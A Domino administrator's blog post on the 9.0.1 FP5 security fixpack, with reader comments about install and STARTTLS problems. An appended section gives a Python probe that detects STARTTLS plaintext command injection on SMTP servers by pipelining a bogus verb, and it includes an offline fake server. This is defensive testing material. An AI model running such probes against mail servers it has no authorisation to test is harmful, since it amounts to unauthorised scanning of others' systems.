Domino on Linux/Unix, Troubleshooting, Best Practices, Tips and more ...

 
Daniel Nashed

Domino 9.0.1 FP5 Security Fixes and Functionality

Daniel Nashed  4 December 2015 15:14:52
This week Domino 9.0.1 FP5 has been released.
The client fixpack seems to have issues. I have seen a Support Flash alert and a couple of customers/partners contacted me with problems.

On the client side I would wait until those problems have been resolved.

But on the server side you should look into implementing FP5 soon.


I have deployed it on my production server and I now also have incoming and outgoing STARTTLS enabled, with additional logging via my SpamGeek application.


In addition to a couple of security fixes, the new version also contains some detail fixes in the TLS area that improve logging and compatibility with other environments, which is especially important for STARTTLS, where the peer is whatever mail server happens to be on the other side.


I currently still have SSLv2 HELLO enabled on my server and I keep monitoring the logs.


And I have noticed some strange behaviour which I have already reported to IBM.
With 9.0.1 FP4 IF2, IBM changed the default cipher list, so in most cases you no longer needed to set SSLCipherSpec: they did a great job of enabling only the secure ciphers by default and putting the other ciphers on the weak list.


In addition to the security fixes, there is also a new JVM patch included in FP5.


The current JVM is 1.6 SR16 FP15, and there is a separate technote available with details of what is fixed.


Some of the fixes in Domino and also in the JVM provide better protection against the Logjam vulnerability (the downgrade of TLS Diffie-Hellman key exchange to weak, export-grade parameters).


There are also a couple of fixes to address memory leaks -- some are in the security area.


So I would recommend considering the update soon, at least on the server side for externally facing servers.


It works well for me and there is additional logging that can be helpful.


Update 10.12.2015: We still see some outgoing TLS connection problems for STARTTLS. I first thought this could be fixed by setting SSLCipherSpec explicitly.
But it turned out that this does not fix it. Still troubleshooting what is going wrong. One customer has a PMR open and I am also tracing...

Comments

1. Craig Wiseman  05.12.2015 15:39:28  Domino 9.0.1 FP5 Security Fixes and Functionality

Thanks for this specifically, and for your continued work and posts on Domino-related config & security.

2. Tim Banks  08.12.2015 17:55:16  Domino 9.0.1 FP5 Security Fixes and Functionality

FP5 failed to install for me on 9.0.1FP4 HF70 Win64. Error message said it detected the wrong version of Domino installed. Now Traveler and HTTPS seem to be broken from something changed during the fixpack installation (which I thought aborted).

3. Dan Silva (@dansilva)  09.12.2015 13:11:33  Re: FP5 failed to install for me on 9.0.1FP4 HF70

@Tim, you need to uninstall HF70 first.

If there are any specific fixes in HF70 for your environment, it's a good practice to check with IBM Support if the fixes in HF70 are included in FP5. If not, you can request a new Hot Fix with the fixes in HF70 for FP5.

Hope this helps!

Daniel

4. Tim Burr  11.12.2015 5:50:58  Domino 9.0.1 FP5 Security Fixes and Functionality

Daniel thanks so much for everything you do! We have been using your Domino linux startup scripts for years and they have been awesome.

Quick question, and I understand if you don't have time to answer.

How did you set this up?

>>I have now also incoming and outgoing "STARTTLS" enabled

5. Stefano Benassi  13.12.2015 8:51:27  Domino 9.0.1 FP5 Security Fixes and Functionality

@Tim this may help you: https://www-304.ibm.com/support/docview.wss?uid=swg21108352

Stefano

6. Daniel Nashed  14.12.2015 6:42:10  Domino 9.0.1 FP5 Security Fixes and Functionality

@Tim Burr, what exactly are you looking for?

You said that you have it enabled. What additional information do you need?

Are you running into any issues?

-- Daniel

7. Tim Burr  16.12.2015 17:34:53  Domino 9.0.1 FP5 Security Fixes and Functionality

Hi Daniel & Stefano,

A security audit found this vulnerability in our setup:

The remote SMTP service contains a software flaw in its STARTTLS implementation that could allow a remote, unauthenticated attacker to inject commands during the plaintext protocol phase that will be executed during the ciphertext protocol phase.

I will review the link Stefano sent and make sure we have it configured correctly.
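The finding quoted in the comment above is the plaintext command injection class of STARTTLS bug: a command pipelined behind STARTTLS in the same plaintext packet survives in the server's read buffer and is executed after the TLS handshake, as if it had arrived encrypted. The probe below is an added example written for this page; it is not code from the post, from IBM, or from any scanner, and it knows nothing about Domino's internals. It sends STARTTLS plus a nonsense verb in one write, completes the handshake, then sends EHLO and looks at the first reply received over TLS: a 5xx answering the nonsense verb means the server executed plaintext-phase input after the handshake (vulnerable), a 250 answering the EHLO means the buffer was discarded. `FakeServerConn` is a constructed in-process stand-in used only to show both behaviours offline; `probe.invalid`, `fake.invalid`, the port and timeout defaults and the verb `XINJECT` are arbitrary placeholders, and `SocketConn` is for servers you are authorised to test.

```python
"""Probe an SMTP server for plaintext command injection across STARTTLS.

A client pipelines a command behind STARTTLS in one plaintext write
("STARTTLS\\r\\nXINJECT\\r\\n").  A vulnerable server keeps the leftover
bytes in its read buffer, finishes the TLS handshake, then executes XINJECT
as if it had arrived encrypted.  A fixed server discards whatever was
buffered before the handshake.  Added example; not Domino or IBM code.
"""
import socket
import ssl
import sys


def _read_reply(read_line):
    """Collect one (possibly multi-line) SMTP reply -> (code, [raw lines])."""
    lines = []
    while True:
        line = read_line()
        if len(line) < 4:
            raise ConnectionError("connection closed or malformed reply")
        lines.append(line)
        if line[3:4] == b" ":          # "250 ..." ends a reply, "250-..." continues
            return int(line[:3]), lines


def probe_starttls_injection(conn, helo=b"probe.invalid", injected=b"XINJECT"):
    """Return (vulnerable, detail).  `injected` is a bogus verb, so executing it
    is harmless; a 5xx answering it after the handshake proves that it ran."""
    code, _ = _read_reply(conn.read_line)                     # 220 greeting
    if code != 220:
        return False, "unexpected greeting %d" % code
    conn.send(b"EHLO " + helo + b"\r\n")
    code, lines = _read_reply(conn.read_line)
    if code != 250 or not any(ln[4:].upper().startswith(b"STARTTLS") for ln in lines):
        return False, "server does not advertise STARTTLS"
    # The injection: STARTTLS and the probe verb in ONE plaintext write.
    conn.send(b"STARTTLS\r\n" + injected + b"\r\n")
    code, _ = _read_reply(conn.read_line)
    if code != 220:
        return False, "STARTTLS refused with %d (pipelined data rejected)" % code
    conn.starttls()                                           # TLS handshake
    conn.send(b"EHLO " + helo + b"\r\n")                      # first TLS command
    code, _ = _read_reply(conn.read_line)
    if code == 250:
        return False, "plaintext buffer discarded: first TLS reply answers EHLO"
    return True, "first TLS reply %d answers %s sent in plaintext" % (code, injected.decode())


class SocketConn:
    """Real TCP transport for probing a live server (only with authorisation)."""

    def __init__(self, host, port=25, timeout=15):
        self.host = host
        self.sock = socket.create_connection((host, port), timeout)

    def send(self, data):
        self.sock.sendall(data)

    def read_line(self):
        buf = b""
        while not buf.endswith(b"\r\n"):
            chunk = self.sock.recv(1)
            if not chunk:
                break
            buf += chunk
        return buf

    def starttls(self):
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE     # probing behaviour, not the certificate
        self.sock = ctx.wrap_socket(self.sock, server_hostname=self.host)


class FakeServerConn:
    """Constructed in-process SMTP server for offline demonstration.  It models
    only the read-buffer handling around STARTTLS, nothing about Domino."""

    def __init__(self, discard_buffer_on_starttls):
        self.discard = discard_buffer_on_starttls
        self.inbuf = b""                        # received, not yet parsed
        self.outbuf = b"220 fake.invalid ESMTP\r\n"
        self.tls = False
        self.awaiting_handshake = False

    def send(self, data):
        self.inbuf += data
        self._run()

    def read_line(self):
        if b"\r\n" not in self.outbuf:
            return b""
        line, self.outbuf = self.outbuf.split(b"\r\n", 1)
        return line + b"\r\n"

    def starttls(self):
        self.awaiting_handshake = False
        self.tls = True
        if self.discard:
            self.inbuf = b""                    # the fix: forget pre-handshake bytes
        self._run()                             # vulnerable server: leftovers run now

    def _run(self):
        while not self.awaiting_handshake and b"\r\n" in self.inbuf:
            line, self.inbuf = self.inbuf.split(b"\r\n", 1)
            self.outbuf += self._handle(line)

    def _handle(self, line):
        verb = line.split(b" ", 1)[0].upper()
        if verb == b"EHLO":
            return b"250 fake.invalid\r\n" if self.tls else b"250-fake.invalid\r\n250 STARTTLS\r\n"
        if verb == b"STARTTLS" and not self.tls:
            self.awaiting_handshake = True
            return b"220 2.0.0 Ready to start TLS\r\n"
        return b"500 5.5.2 Command not recognised\r\n"


if __name__ == "__main__":
    if len(sys.argv) > 1:                       # probe.py host [port]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 25
        print(probe_starttls_injection(SocketConn(sys.argv[1], port)))
    else:
        for discard in (False, True):
            print("discard buffer:", discard, "->", probe_starttls_injection(FakeServerConn(discard)))
```

The probe deliberately sends nothing over TLS until the EHLO, so the only way a 5xx can be the first encrypted reply is if the server carried the plaintext verb across the handshake. A server that answers the pipelined STARTTLS with something other than 220 (some implementations refuse STARTTLS when data is already queued behind it) is reported as not vulnerable with that reason, which is the other correct way to close the hole.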
